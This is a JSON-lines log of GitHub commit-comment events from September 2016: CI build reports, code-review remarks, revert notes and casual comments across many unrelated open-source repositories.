{"id":"4594089062","type":"CommitCommentEvent","actor":{"login":"nrel-bot-2"},"repo":{"name":"NREL/EnergyPlus"},"payload":{"comment":{"id":19108203,"position":null,"line":null,"path":null,"commit_id":"adf12cf0a2732048ad0cd5cf06c06af74de512da","created_at":"2016-09-21T05:07:02Z","updated_at":"2016-09-21T05:07:02Z","body":"GetInternalVariableBug (mjwitte) - x86_64-Linux-Ubuntu-14.04-gcc-4.8-IntegrationCoverage-Debug: OK (1767 of 1767 tests passed, 0 test warnings)\n\n\n\n<a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-adf12cf0a2732048ad0cd5cf06c06af74de512da-x86_64-Linux-Ubuntu-14.04-gcc-4.8-IntegrationCoverage-Debug.html'>![Build Badge](http://img.shields.io/badge/build%20status-passing-green.svg)</a> <a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-adf12cf0a2732048ad0cd5cf06c06af74de512da-x86_64-Linux-Ubuntu-14.04-gcc-4.8-IntegrationCoverage-Debug.html'>![Test Badge](http://img.shields.io/badge/tests%20passed-100.0%25-green.svg)</a> <a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-adf12cf0a2732048ad0cd5cf06c06af74de512da-x86_64-Linux-Ubuntu-14.04-gcc-4.8-IntegrationCoverage-Debug.html'>![Coverage Badge](http://img.shields.io/badge/coverage%20status-71.13%25-green.svg)</a>\n"}},"created_at":"2016-09-21T05:07:02Z"}
{"id":"4594089469","type":"CommitCommentEvent","actor":{"login":"yamaplay-tckm"},"repo":{"name":"yamaplay-tckm/FirstProject"},"payload":{"comment":{"id":19108204,"position":3,"line":3,"path":"index.php","commit_id":"7671a83e5932302b1eccb3e73b147a9278610753","created_at":"2016-09-21T05:07:14Z","updated_at":"2016-09-21T05:07:14Z","body":"可以省略結束標籤"}},"created_at":"2016-09-21T05:07:14Z"}
{"id":"4594091010","type":"CommitCommentEvent","actor":{"login":"JoviChan"},"repo":{"name":"JoviChan/Android-Change-Page-Control"},"payload":{"comment":{"id":19108207,"position":2,"line":2,"path":"README.md","commit_id":"35e3071810a1eaf6aa813b11e8ff44c4b31938b5","created_at":"2016-09-21T05:07:54Z","updated_at":"2016-09-21T05:07:54Z","body":"# 使用方法"}},"created_at":"2016-09-21T05:07:54Z"}
{"id":"4594091221","type":"CommitCommentEvent","actor":{"login":"nrel-bot-2"},"repo":{"name":"NREL/EnergyPlus"},"payload":{"comment":{"id":19108208,"position":null,"line":null,"path":null,"commit_id":"adf12cf0a2732048ad0cd5cf06c06af74de512da","created_at":"2016-09-21T05:07:59Z","updated_at":"2016-09-21T05:07:59Z","body":"GetInternalVariableBug (mjwitte) - x86_64-Linux-Ubuntu-14.04-custom_check: OK (0 of 0 tests passed, 0 test warnings)\n\n\n\n<a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-adf12cf0a2732048ad0cd5cf06c06af74de512da-x86_64-Linux-Ubuntu-14.04-custom_check.html'>![Build Badge](http://img.shields.io/badge/build%20status-passing-green.svg)</a>  \n"}},"created_at":"2016-09-21T05:07:59Z"}
{"id":"4594092957","type":"CommitCommentEvent","actor":{"login":"trombik"},"repo":{"name":"reallyenglish/ansible-role-npppd"},"payload":{"comment":{"id":19108212,"position":82,"line":53,"path":"test/serverspec/default_spec.rb","commit_id":"cf42cf8e132d2ebd1277d8b466856e02e8f22ae1","created_at":"2016-09-21T05:08:40Z","updated_at":"2016-09-21T05:08:40Z","body":"see https://github.com/reallyenglish/ansible-role-npppd/issues/3"}},"created_at":"2016-09-21T05:08:40Z"}
{"id":"4594093195","type":"CommitCommentEvent","actor":{"login":"nwnolte"},"repo":{"name":"IslandMusic/PMoC"},"payload":{"comment":{"id":19108215,"position":5,"line":52,"path":"app/src/main/java/islandmusic/apeoplesmapofcorvallisapp/MapSelector.java","commit_id":"45e6a140e65856bb1017d29b2fd969665f5a5a49","created_at":"2016-09-21T05:08:47Z","updated_at":"2016-09-21T05:08:47Z","body":"#bug1 this probably just needs to be moved up one curly brace between 49 and 50? }"}},"created_at":"2016-09-21T05:08:47Z"}
{"id":"4594096708","type":"CommitCommentEvent","actor":{"login":"purushuchinna"},"repo":{"name":"purushuchinna/hello-world2"},"payload":{"comment":{"id":19108224,"position":null,"line":null,"path":null,"commit_id":"cd640453e06ce71959698b8eb8675f4cf15ec85a","created_at":"2016-09-21T05:10:15Z","updated_at":"2016-09-21T05:10:15Z","body":"Hello again this is a new update***"}},"created_at":"2016-09-21T05:10:15Z"}
{"id":"4594098455","type":"CommitCommentEvent","actor":{"login":"noloader"},"repo":{"name":"weidai11/cryptopp"},"payload":{"comment":{"id":19108229,"position":null,"line":null,"path":null,"commit_id":"32ae3e52f1e7eb0bf06af94f58ca7abcc5494bfb","created_at":"2016-09-21T05:11:00Z","updated_at":"2016-09-21T05:11:00Z","body":"Also see the discussion at [Commit 714daaf5706e9e2b](https://github.com/weidai11/cryptopp/commit/714daaf5706e9e2b196beb5446cc4f53d1652c75)."}},"created_at":"2016-09-21T05:11:00Z"}
{"id":"4594104589","type":"CommitCommentEvent","actor":{"login":"noloader"},"repo":{"name":"weidai11/cryptopp"},"payload":{"comment":{"id":19108242,"position":null,"line":null,"path":null,"commit_id":"aaedeaa6471d09a87b54f945442a7a8e175924f5","created_at":"2016-09-21T05:13:32Z","updated_at":"2016-09-21T05:13:32Z","body":"Thsi was backed out at [Commit c298dfdbb017076d](http://github.com/weidai11/cryptopp/commit/c298dfdbb017076de1e2f1b6bb8ccd00fe85fb95)"}},"created_at":"2016-09-21T05:13:32Z"}
{"id":"4594105914","type":"CommitCommentEvent","actor":{"login":"noloader"},"repo":{"name":"weidai11/cryptopp"},"payload":{"comment":{"id":19108246,"position":null,"line":null,"path":null,"commit_id":"26c8fa3976f255d312de741a41f830b1459257ab","created_at":"2016-09-21T05:14:09Z","updated_at":"2016-09-21T05:14:09Z","body":"This was backed out at [Commit c298dfdbb017076d](http://github.com/weidai11/cryptopp/commit/c298dfdbb017076de1e2f1b6bb8ccd00fe85fb95)"}},"created_at":"2016-09-21T05:14:09Z"}
{"id":"4594106268","type":"CommitCommentEvent","actor":{"login":"nanosoldier"},"repo":{"name":"JuliaLang/julia"},"payload":{"comment":{"id":19108247,"position":null,"line":null,"path":null,"commit_id":"c485fc068468c4de8809715d2ba9a01c80e5398f","created_at":"2016-09-21T05:14:18Z","updated_at":"2016-09-21T05:14:18Z","body":"[Your benchmark job](https://github.com/JuliaLang/julia/commit/c485fc068468c4de8809715d2ba9a01c80e5398f#commitcomment-19107803) has completed - possible performance regressions were detected. A full report can be found [here](https://github.com/JuliaCI/BaseBenchmarkReports/blob/feab52ae7fe4e5d78f435f5dbb570167c49ac4ba/daily_2016_9_21/report.md). cc @jrevels"}},"created_at":"2016-09-21T05:14:18Z"}
{"id":"4594112101","type":"CommitCommentEvent","actor":{"login":"frol"},"repo":{"name":"ivlis/docker-alpine-postgres"},"payload":{"comment":{"id":19108261,"position":null,"line":null,"path":null,"commit_id":"2c5b9080ad485953ecfea5770102d1b241e991c9","created_at":"2016-09-21T05:16:35Z","updated_at":"2016-09-21T05:16:35Z","body":"Openssl was updated in Alpine; it is just a false positive of the Docker Hub vulnerability checker: https://github.com/gliderlabs/docker-alpine/commit/a32a44b699ac5b973360d65141b84550d58eb14c\r\n\r\nYou can remove `apk upgrade` and I also suggest you use `apk --no-cache add ...`."}},"created_at":"2016-09-21T05:16:35Z"}
{"id":"4594112723","type":"CommitCommentEvent","actor":{"login":"tayfunoziserikan"},"repo":{"name":"HamdiBayhan/Card-Entry-System-Project-with-Rails"},"payload":{"comment":{"id":19108262,"position":10,"line":12,"path":"app/controllers/members_controller.rb","commit_id":"46e74b53d35d5c3ca9df26f4b37b35ecd92abba2","created_at":"2016-09-21T05:16:51Z","updated_at":"2016-09-21T05:16:51Z","body":" Use snake_case for symbols, methods and variables.  See details: https://github.com/bbatsov/ruby-style-guide#snake-case-symbols-methods-vars"}},"created_at":"2016-09-21T05:16:51Z"}
{"id":"4594113071","type":"CommitCommentEvent","actor":{"login":"Shavakan"},"repo":{"name":"sparcs-kaist/heartbeat"},"payload":{"comment":{"id":19108263,"position":null,"line":null,"path":null,"commit_id":"c68ee83c875444a31a8b11f39891f4f362974752","created_at":"2016-09-21T05:16:59Z","updated_at":"2016-09-21T05:16:59Z","body":"무슨 뜻입니카?"}},"created_at":"2016-09-21T05:16:59Z"}
{"id":"4594114307","type":"CommitCommentEvent","actor":{"login":"dlom"},"repo":{"name":"Skunkworks1983/Loading-Bar-Package"},"payload":{"comment":{"id":19108265,"position":11,"line":11,"path":"README.md","commit_id":"49d4dfac1088ecf36ecfb7942ca9a15cc928c3b9","created_at":"2016-09-21T05:17:31Z","updated_at":"2016-09-21T05:17:31Z","body":"Can I program the robot using WebStorm? It's the only editor I know how to use."}},"created_at":"2016-09-21T05:17:31Z"}
{"id":"4594119733","type":"CommitCommentEvent","actor":{"login":"gvaditya"},"repo":{"name":"gvaditya/csvtojson"},"payload":{"comment":{"id":19108279,"position":null,"line":null,"path":null,"commit_id":"d30d7dccca9a8f4acc5700232571f87e2c3f29a6","created_at":"2016-09-21T05:19:55Z","updated_at":"2016-09-21T05:19:55Z","body":"ngdf"}},"created_at":"2016-09-21T05:19:55Z"}
{"id":"4594120302","type":"CommitCommentEvent","actor":{"login":"johnraff"},"repo":{"name":"BunsenLabs/bunsen-pipemenus"},"payload":{"comment":{"id":19108282,"position":null,"line":null,"path":null,"commit_id":"64133dd99db0542dbbc4f739b7003a78af2ea477","created_at":"2016-09-21T05:20:09Z","updated_at":"2016-09-21T05:20:09Z","body":"As you say, not such a big isssue. If a majority of people preferred scripts being executable in the source packages, I would go along with it. \r\n\r\nAt least we should be consistent though, so I brought the bunsen-pipemenus scripts in line with files in other packages."}},"created_at":"2016-09-21T05:20:09Z"}
{"id":"4594121665","type":"CommitCommentEvent","actor":{"login":"tayfunoziserikan"},"repo":{"name":"HamdiBayhan/Card-Entry-System-Project-with-Rails"},"payload":{"comment":{"id":19108286,"position":5,"line":4,"path":"Gemfile","commit_id":"3d0f100b398de300e35f1e25538ac1b353ccbd6e","created_at":"2016-09-21T05:20:42Z","updated_at":"2016-09-21T05:20:42Z","body":"Why did you want to use this Gem? Can you explain?"}},"created_at":"2016-09-21T05:20:42Z"}
{"id":"4594121986","type":"CommitCommentEvent","actor":{"login":"AinoMegumi"},"repo":{"name":"m0bec/UNO"},"payload":{"comment":{"id":19108287,"position":null,"line":null,"path":null,"commit_id":"10293db2eb923bf1da4c406f6c579d36a951015a","created_at":"2016-09-21T05:20:50Z","updated_at":"2016-09-21T05:20:50Z","body":"戻すのはいいがその代わりこちらではビルドもエラー判別もできなくなるからな。\r\nこちらの環境変数いじる気はないから。"}},"created_at":"2016-09-21T05:20:50Z"}
{"id":"4594125807","type":"CommitCommentEvent","actor":{"login":"jamuhl"},"repo":{"name":"i18next/i18next-xhr-backend"},"payload":{"comment":{"id":19108298,"position":null,"line":null,"path":null,"commit_id":"7266b32931e13af985887a6d190ed3e1927c18ad","created_at":"2016-09-21T05:22:27Z","updated_at":"2016-09-21T05:22:27Z","body":"see: https://github.com/i18next/i18next-xhr-backend/issues/239"}},"created_at":"2016-09-21T05:22:27Z"}
{"id":"4594128710","type":"CommitCommentEvent","actor":{"login":"gyoo4321"},"repo":{"name":"gyoo4321/redux"},"payload":{"comment":{"id":19108304,"position":3,"line":7,"path":"README.md","commit_id":"5790c694a1a2203ccd3b7085091fee3ec7bae6ba","created_at":"2016-09-21T05:23:45Z","updated_at":"2016-09-21T05:23:45Z","body":"note to self"}},"created_at":"2016-09-21T05:23:45Z"}
{"id":"4594131330","type":"CommitCommentEvent","actor":{"login":"kugel-"},"repo":{"name":"geany/geany"},"payload":{"comment":{"id":19108316,"position":null,"line":null,"path":null,"commit_id":"437837d3a54367393c41d6c1e1f4d1af4481627e","created_at":"2016-09-21T05:24:57Z","updated_at":"2016-09-21T05:24:57Z","body":"The data is destroyed depending on whether it was set at load (free at unload) or init (free at cleanup). See LOAD_DATA flag. This is also documented this way."}},"created_at":"2016-09-21T05:24:57Z"}
{"id":"4594132389","type":"CommitCommentEvent","actor":{"login":"swashcap"},"repo":{"name":"MRN-Code/coinstac"},"payload":{"comment":{"id":19108320,"position":null,"line":null,"path":null,"commit_id":"5313f562f33dc83290a7d3210efb8be5e597ce54","created_at":"2016-09-21T05:25:24Z","updated_at":"2016-09-21T05:25:24Z","body":"Yeah…my reasoning is that the long stack traces don’t make sense to algorithm authors. They need simple, human-readable errors based on my limited experience."}},"created_at":"2016-09-21T05:25:24Z"}
{"id":"4594138161","type":"CommitCommentEvent","actor":{"login":"Jacques00"},"repo":{"name":"OXOIndustries/Trials-in-Tainted-Space"},"payload":{"comment":{"id":19108328,"position":null,"line":null,"path":null,"commit_id":"57fa41f3616e7c587196363fafd68de80bab8db8","created_at":"2016-09-21T05:27:51Z","updated_at":"2016-09-21T05:27:51Z","body":"Might need to revert this change, I think, since it was included in here: https://github.com/OXOIndustries/Trials-in-Tainted-Space/pull/940/commits/3a5253fdfeb54d6d41fe55c1b265cf9effac74ee"}},"created_at":"2016-09-21T05:27:51Z"}
{"id":"4594139146","type":"CommitCommentEvent","actor":{"login":"codebrainz"},"repo":{"name":"geany/geany"},"payload":{"comment":{"id":19108329,"position":null,"line":null,"path":null,"commit_id":"437837d3a54367393c41d6c1e1f4d1af4481627e","created_at":"2016-09-21T05:28:10Z","updated_at":"2016-09-21T05:28:10Z","body":"That could probably fixed by having a different data scoped to the module and the activation."}},"created_at":"2016-09-21T05:28:10Z"}
{"id":"4594140509","type":"CommitCommentEvent","actor":{"login":"benharsh"},"repo":{"name":"chapel-lang/chapel"},"payload":{"comment":{"id":19108335,"position":null,"line":null,"path":null,"commit_id":"121463b59c5f83a64e4ff82d9726243e98cb9d2e","created_at":"2016-09-21T05:28:42Z","updated_at":"2016-09-21T05:28:42Z","body":"While I think the atomic load/store could work, I'm guessing we'd see some non-trivial performance regressions. IIRC, there are a lot of calls to chpl_getPrivatizedClass in the generated code (i'm not sure about michael's array work). I'd like to think we could perform some kind of compiler optimization to just fetch that value once, but I suppose it would be worth verifying performance issues first."}},"created_at":"2016-09-21T05:28:42Z"}
{"id":"4594140595","type":"CommitCommentEvent","actor":{"login":"djc"},"repo":{"name":"briansmith/ring"},"payload":{"comment":{"id":19108336,"position":null,"line":null,"path":null,"commit_id":"7d18737eef256d63fc930a8a18949c65efea3b76","created_at":"2016-09-21T05:28:44Z","updated_at":"2016-09-21T05:28:44Z","body":"Was the addition of the libssh submodule here intentional? "}},"created_at":"2016-09-21T05:28:44Z"}
{"id":"4594144725","type":"CommitCommentEvent","actor":{"login":"codebrainz"},"repo":{"name":"geany/geany"},"payload":{"comment":{"id":19108347,"position":null,"line":null,"path":null,"commit_id":"437837d3a54367393c41d6c1e1f4d1af4481627e","created_at":"2016-09-21T05:30:19Z","updated_at":"2016-09-21T05:30:19Z","body":"For example `geany_plugin_register_full()` could register the module-bound data and we could add a `GData*` list to the `GeanyPlugin` for activation-bound arbitrary data (similar to document-data)."}},"created_at":"2016-09-21T05:30:19Z"}
{"id":"4594150019","type":"CommitCommentEvent","actor":{"login":"frangarcj"},"repo":{"name":"libretro/picodrive"},"payload":{"comment":{"id":19108365,"position":null,"line":null,"path":null,"commit_id":"937c7e5283809a100d4b504296576878d2016ea0","created_at":"2016-09-21T05:32:23Z","updated_at":"2016-09-21T05:32:23Z","body":"-marm is not recommended\r\n\r\nUse -mthumb always"}},"created_at":"2016-09-21T05:32:23Z"}
{"id":"4594150313","type":"CommitCommentEvent","actor":{"login":"kugel-"},"repo":{"name":"geany/geany"},"payload":{"comment":{"id":19108367,"position":null,"line":null,"path":null,"commit_id":"437837d3a54367393c41d6c1e1f4d1af4481627e","created_at":"2016-09-21T05:32:31Z","updated_at":"2016-09-21T05:32:31Z","body":"Why does it need fixing? Is it broken?"}},"created_at":"2016-09-21T05:32:31Z"}
{"id":"4594151341","type":"CommitCommentEvent","actor":{"login":"stephanlukasczyk"},"repo":{"name":"vulder/INAW"},"payload":{"comment":{"id":19108370,"position":null,"line":null,"path":null,"commit_id":"c0b595855e3c2b070af307ec21526ee3bb56c07c","created_at":"2016-09-21T05:32:56Z","updated_at":"2016-09-21T05:32:56Z","body":"Ups, sorry. And I thought, every platform has `/dev/null` "}},"created_at":"2016-09-21T05:32:56Z"}
{"id":"4594151473","type":"CommitCommentEvent","actor":{"login":"GrayHatter"},"repo":{"name":"JFreegman/toxic"},"payload":{"comment":{"id":19108371,"position":null,"line":null,"path":null,"commit_id":"221d761ff49f3e6fb3e9ae0a0be49366054d7339","created_at":"2016-09-21T05:32:59Z","updated_at":"2016-09-21T05:32:59Z","body":"what happens when someone tries to run Toxic without an IP4 address, and only an IP6?\r\n"}},"created_at":"2016-09-21T05:32:59Z"}
{"id":"4594152019","type":"CommitCommentEvent","actor":{"login":"fairlight1337"},"repo":{"name":"code-iai/designator_integration"},"payload":{"comment":{"id":19108372,"position":null,"line":null,"path":null,"commit_id":"9e3a37ab533c1fb0a87c8ace958940bb42284c50","created_at":"2016-09-21T05:33:13Z","updated_at":"2016-09-21T05:33:13Z","body":"Whoops, I didn't see that this change was on my <kbd>master</kbd> branch (was only meant to be on <kbd>serialize-3d-vector</kbd>, but seems to have gotten merged into <kbd>master</kbd>). Sorry for the push.\r\n\r\nWell, this forces me to resolve the issue timely, @airballking."}},"created_at":"2016-09-21T05:33:13Z"}
{"id":"4594152329","type":"CommitCommentEvent","actor":{"login":"codebrainz"},"repo":{"name":"geany/geany"},"payload":{"comment":{"id":19108373,"position":null,"line":null,"path":null,"commit_id":"437837d3a54367393c41d6c1e1f4d1af4481627e","created_at":"2016-09-21T05:33:20Z","updated_at":"2016-09-21T05:33:20Z","body":"It's awkward and could be more convenient."}},"created_at":"2016-09-21T05:33:20Z"}
{"id":"4594154305","type":"CommitCommentEvent","actor":{"login":"pipicha111"},"repo":{"name":"facebook/fbctf"},"payload":{"comment":{"id":19108375,"position":null,"line":null,"path":null,"commit_id":"6cab8b4b38535c6b04a91031e838e0961d188834","created_at":"2016-09-21T05:34:08Z","updated_at":"2016-09-21T05:34:08Z","body":"Lucas171616@ gmail.com\n"}},"created_at":"2016-09-21T05:34:08Z"}
{"id":"4594154355","type":"CommitCommentEvent","actor":{"login":"covers1624"},"repo":{"name":"TheCBProject/CodeChickenLib"},"payload":{"comment":{"id":19108376,"position":null,"line":null,"path":null,"commit_id":"8e1df7901ba88269d7eab46198c6aa647a41635c","created_at":"2016-09-21T05:34:09Z","updated_at":"2016-09-21T05:34:09Z","body":"Looks all good, ill work on removing the use of BlockCoord accross all mods. There was some other stuff i wanted to add to the Vec system. I may just bite the bullet and do the same for the transforms."}},"created_at":"2016-09-21T05:34:09Z"}
{"id":"4594155374","type":"CommitCommentEvent","actor":{"login":"nrel-bot-2"},"repo":{"name":"NREL/EnergyPlus"},"payload":{"comment":{"id":19108378,"position":null,"line":null,"path":null,"commit_id":"303197203d9cb1642089f54b6263dd29eba6a897","created_at":"2016-09-21T05:34:32Z","updated_at":"2016-09-21T05:34:32Z","body":"GetInternalVariableBug (mjwitte) - x86_64-Linux-Ubuntu-14.04-gcc-4.8-UnitTestsCoverage-Debug: OK (1193 of 1193 tests passed, 0 test warnings)\n\n\n\n<a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-303197203d9cb1642089f54b6263dd29eba6a897-x86_64-Linux-Ubuntu-14.04-gcc-4.8-UnitTestsCoverage-Debug.html'>![Build Badge](http://img.shields.io/badge/build%20status-passing-green.svg)</a> <a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-303197203d9cb1642089f54b6263dd29eba6a897-x86_64-Linux-Ubuntu-14.04-gcc-4.8-UnitTestsCoverage-Debug.html'>![Test Badge](http://img.shields.io/badge/tests%20passed-100.0%25-green.svg)</a> <a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-303197203d9cb1642089f54b6263dd29eba6a897-x86_64-Linux-Ubuntu-14.04-gcc-4.8-UnitTestsCoverage-Debug.html'>![Coverage Badge](http://img.shields.io/badge/coverage%20status-36.12%25-green.svg)</a>\n"}},"created_at":"2016-09-21T05:34:32Z"}
{"id":"4594157815","type":"CommitCommentEvent","actor":{"login":"stephanlukasczyk"},"repo":{"name":"vulder/INAW"},"payload":{"comment":{"id":19108385,"position":17,"line":16,"path":"code/modules/TreeParser.py","commit_id":"611a360ff3ba50c9baaaf2737863f7e468a5cbc7","created_at":"2016-09-21T05:35:30Z","updated_at":"2016-09-21T05:35:30Z","body":"We'd also need to close the socket, wouldn't we? Do you  think, something like loading the class in a try-with-resources construct can do this? Or do you know a way to implement a resource management in this way? Otherwise, we might need a `close` or `shutdown` method to be called when the parser isn't needed any more, that closes the socket and kills the subprocess"}},"created_at":"2016-09-21T05:35:30Z"}
{"id":"4594162239","type":"CommitCommentEvent","actor":{"login":"k83329"},"repo":{"name":"NTHU-EE-CV-2016-Fall/homework0"},"payload":{"comment":{"id":19108393,"position":null,"line":null,"path":null,"commit_id":"9f8ebc781901e46b895687125de50db3ee64cfb0","created_at":"2016-09-21T05:37:12Z","updated_at":"2016-09-21T05:37:12Z","body":"大家好，我是王昱智，原就讀於逢甲大學電子工程學系。希望可以有機會認識大家，平常的興趣是:打羽球、籃球與看電影。"}},"created_at":"2016-09-21T05:37:12Z"}
{"id":"4594162849","type":"CommitCommentEvent","actor":{"login":"torunar"},"repo":{"name":"cscart/addon-free-shipping-label"},"payload":{"comment":{"id":19108396,"position":12,"line":12,"path":"design/themes/responsive/templates/addons/free_shipping_label_image/hooks/index/scripts.post.tpl","commit_id":"e1d14134aa4c00e7add91d1afb8eecf7dde1f997","created_at":"2016-09-21T05:37:27Z","updated_at":"2016-09-21T05:37:27Z","body":"Это для отображения  плакши в окне QuickView?"}},"created_at":"2016-09-21T05:37:27Z"}
{"id":"4594163685","type":"CommitCommentEvent","actor":{"login":"Maryom"},"repo":{"name":"SwiftKitz/Appz"},"payload":{"comment":{"id":19108399,"position":null,"line":null,"path":null,"commit_id":"fa2df5dbb92914c18b522cb1ce7c991d7fb871a7","created_at":"2016-09-21T05:37:48Z","updated_at":"2016-09-21T05:37:48Z","body":"I'm really sorry I didn't notice that these lines were damaged :( "}},"created_at":"2016-09-21T05:37:48Z"}
{"id":"4594167155","type":"CommitCommentEvent","actor":{"login":"nrel-bot"},"repo":{"name":"NREL/EnergyPlus"},"payload":{"comment":{"id":19108405,"position":null,"line":null,"path":null,"commit_id":"ee5f2d18ffd0807abd15b7f27b43f7bd2050c600","created_at":"2016-09-21T05:39:02Z","updated_at":"2016-09-21T05:39:02Z","body":"Sizing-Simple-Chilled-Ceiling (RKStrand) - i386-Windows-7-VisualStudio-12: OK (2335 of 2339 tests passed, 1 test warnings)\n\n * 5 tests had: EIO diffs.\n * 1 test had: ESO small diffs.\n * 3 tests had: AUD diffs.\n * 4 tests had: ESO big diffs.\n * 3 tests had: MTR big diffs.\n * 4 tests had: Table big diffs.\n * 2 tests had: ERR diffs.\n * 1 test had: SSZ small diffs.\n * 1 test had: ZSZ small diffs.\n\n\n<a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-ee5f2d18ffd0807abd15b7f27b43f7bd2050c600-i386-Windows-7-VisualStudio-12.html'>![Build Badge](http://img.shields.io/badge/build%20status-passing-green.svg)</a> <a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-ee5f2d18ffd0807abd15b7f27b43f7bd2050c600-i386-Windows-7-VisualStudio-12.html'>![Test Badge](http://img.shields.io/badge/tests%20passed-99.83%25-yellow.svg)</a> \n"}},"created_at":"2016-09-21T05:39:02Z"}
{"id":"4594167296","type":"CommitCommentEvent","actor":{"login":"henning"},"repo":{"name":"Palleiro/HCTControl"},"payload":{"comment":{"id":19108406,"position":null,"line":null,"path":null,"commit_id":"61fcecc9fb52405c3497da90b5148f67e5cd996d","created_at":"2016-09-21T05:39:06Z","updated_at":"2016-09-21T05:39:06Z","body":"I am not henning didenhof... You referred the wrong github username...\n\nAm Mittwoch, 21. September 2016 schrieb Palleiro :\n\n> - Add Crop Image, thanks @Henning Dodenhof for library.\n>\n> --\n> You are receiving this because you were mentioned.\n> Reply to this email directly or view it on GitHub:\n> https://github.com/Palleiro/HCTControl/commit/\n> 61fcecc9fb52405c3497da90b5148f67e5cd996d\n>\n\n\n-- \nHenning Sprang\nhttp://www.sprang.de\n"}},"created_at":"2016-09-21T05:39:06Z"}
{"id":"4594167832","type":"CommitCommentEvent","actor":{"login":"agent009sa"},"repo":{"name":"agent009sa/de"},"payload":{"comment":{"id":19108408,"position":null,"line":null,"path":null,"commit_id":"c283068e06812c284972ceb7241d8df29b0d14dc","created_at":"2016-09-21T05:39:19Z","updated_at":"2016-09-21T05:39:19Z","body":"Легионер из трущоб"}},"created_at":"2016-09-21T05:39:19Z"}
{"id":"4594168531","type":"CommitCommentEvent","actor":{"login":"md5"},"repo":{"name":"SuperTux88/rubymetrics-plugin"},"payload":{"comment":{"id":19108409,"position":null,"line":null,"path":null,"commit_id":"61f5f2ad69c284e89e7d04660fb6365ddc780eb3","created_at":"2016-09-21T05:39:36Z","updated_at":"2016-09-21T05:39:36Z","body":"FYI, I tested out this commit and was able to get Rcov results based on the output of `simplecov-rcov`. My `Jenkinsfile` looks like this:\r\n\r\n```groovy\r\nnode {\r\n    stage('checkout') {\r\n        git url: \"https://github.com/appropriate/omniauth-saml.git\", branch: 'rcov'\r\n    }\r\n    \r\n    stage('bundle install') {\r\n        sh 'bundle install'\r\n    }\r\n    \r\n    stage('rspec') {\r\n        sh 'bundle exec rspec'\r\n    }\r\n    \r\n    stage('publish coverage') {\r\n        step([$class: 'hudson.plugins.rubyMetrics.rcov.RcovPublisher', reportDir: \"coverage/rcov\"])\r\n    }\r\n}\r\n```\r\n\r\nThe one hiccup I ran into was a `NullPointerException` before I specified `reportDir`. I seem to recall seeing some other Jenkins plugin code that has a \"not null\" annotation of some sort that could have caught that. Otherwise, it would be pretty straightforward to add code to the constructor to throw an `Exception` if `reportDir` is `null`.\r\n\r\nOne thing I'm still trying to work out is how to set the metric targets. I think it will involve setting `targets` on the step and somehow constructing the approprate `MetricTarget` instances. I'm not up-to-date with the latest Jenkins development ecosystem, so I'm not sure if the lack of `@DataBoundSetter` on `setTargets()` is going to be a hindrance."}},"created_at":"2016-09-21T05:39:36Z"}
{"id":"4594168583","type":"CommitCommentEvent","actor":{"login":"staticfloat"},"repo":{"name":"JuliaLang/Homebrew.jl"},"payload":{"comment":{"id":19108410,"position":null,"line":null,"path":null,"commit_id":"89e164f514b733553940cb0af8ce02e1a6a09178","created_at":"2016-09-21T05:39:38Z","updated_at":"2016-09-21T05:39:38Z","body":"Huh.  So that's how you do it.  What if I want to (eventually) test on multiple versions of OSX?"}},"created_at":"2016-09-21T05:39:38Z"}
{"id":"4594171349","type":"CommitCommentEvent","actor":{"login":"ale-git"},"repo":{"name":"robotology/icub-main"},"payload":{"comment":{"id":19108420,"position":null,"line":null,"path":null,"commit_id":"3b0616ca6b81591c5414bfeda7c43d3adc92ed5d","created_at":"2016-09-21T05:40:46Z","updated_at":"2016-09-21T05:40:46Z","body":"Hi @paulfitz :)\r\nSo it is a Ptgrey timestamp embedded in the image... pretty hard to guees, lol.  Thanks! "}},"created_at":"2016-09-21T05:40:46Z"}
{"id":"4594173800","type":"CommitCommentEvent","actor":{"login":"a1sams1a"},"repo":{"name":"sparcs-kaist/heartbeat"},"payload":{"comment":{"id":19108424,"position":null,"line":null,"path":null,"commit_id":"c68ee83c875444a31a8b11f39891f4f362974752","created_at":"2016-09-21T05:41:45Z","updated_at":"2016-09-21T05:41:45Z","body":"1. 서버 연결 실패시 -> 바로 wheel-active에게 메일을 보낸다\r\n2. 인터넷 연결 실패시 -> 뭘 하지? 팝콘 섭취?\r\n3. 1, 2 공통으로 로그를 파일에 쌓아놓은다음... 다음에 다시 보내나?"}},"created_at":"2016-09-21T05:41:45Z"}
{"id":"4594173810","type":"CommitCommentEvent","actor":{"login":"jenananthan"},"repo":{"name":"wso2-extensions/identity-inbound-auth-saml-cloud"},"payload":{"comment":{"id":19108425,"position":340,"line":1151,"path":"components/org.wso2.carbon.identity.sso.saml.cloud/src/main/java/org/wso2/carbon/identity/sso/saml/cloud/util/SAMLSSOUtil.java","commit_id":"c1b88ebd477fc28ddb17e185182c4fbcf4b96f3c","created_at":"2016-09-21T05:41:45Z","updated_at":"2016-09-21T05:41:45Z","body":"DO a null check https://github.com/wso2-extensions/identity-inbound-auth-saml-cloud/blob/c1b88ebd477fc28ddb17e185182c4fbcf4b96f3c/components/org.wso2.carbon.identity.sso.saml.cloud/src/main/java/org/wso2/carbon/identity/sso/saml/cloud/util/SAMLSSOUtil.java#L1108"}},"created_at":"2016-09-21T05:41:45Z"}
{"id":"4594177720","type":"CommitCommentEvent","actor":{"login":"fairlight1337"},"repo":{"name":"code-iai/designator_integration"},"payload":{"comment":{"id":19108432,"position":null,"line":null,"path":null,"commit_id":"9e3a37ab533c1fb0a87c8ace958940bb42284c50","created_at":"2016-09-21T05:43:16Z","updated_at":"2016-09-21T05:43:16Z","body":"Ah what the heck, let's revert that. This issue deserves a more elaborate approach.\r\n\r\nDid so in https://github.com/code-iai/designator_integration/commit/0e1f0891732a760b257d36abc73b224617c5d88b."}},"created_at":"2016-09-21T05:43:16Z"}
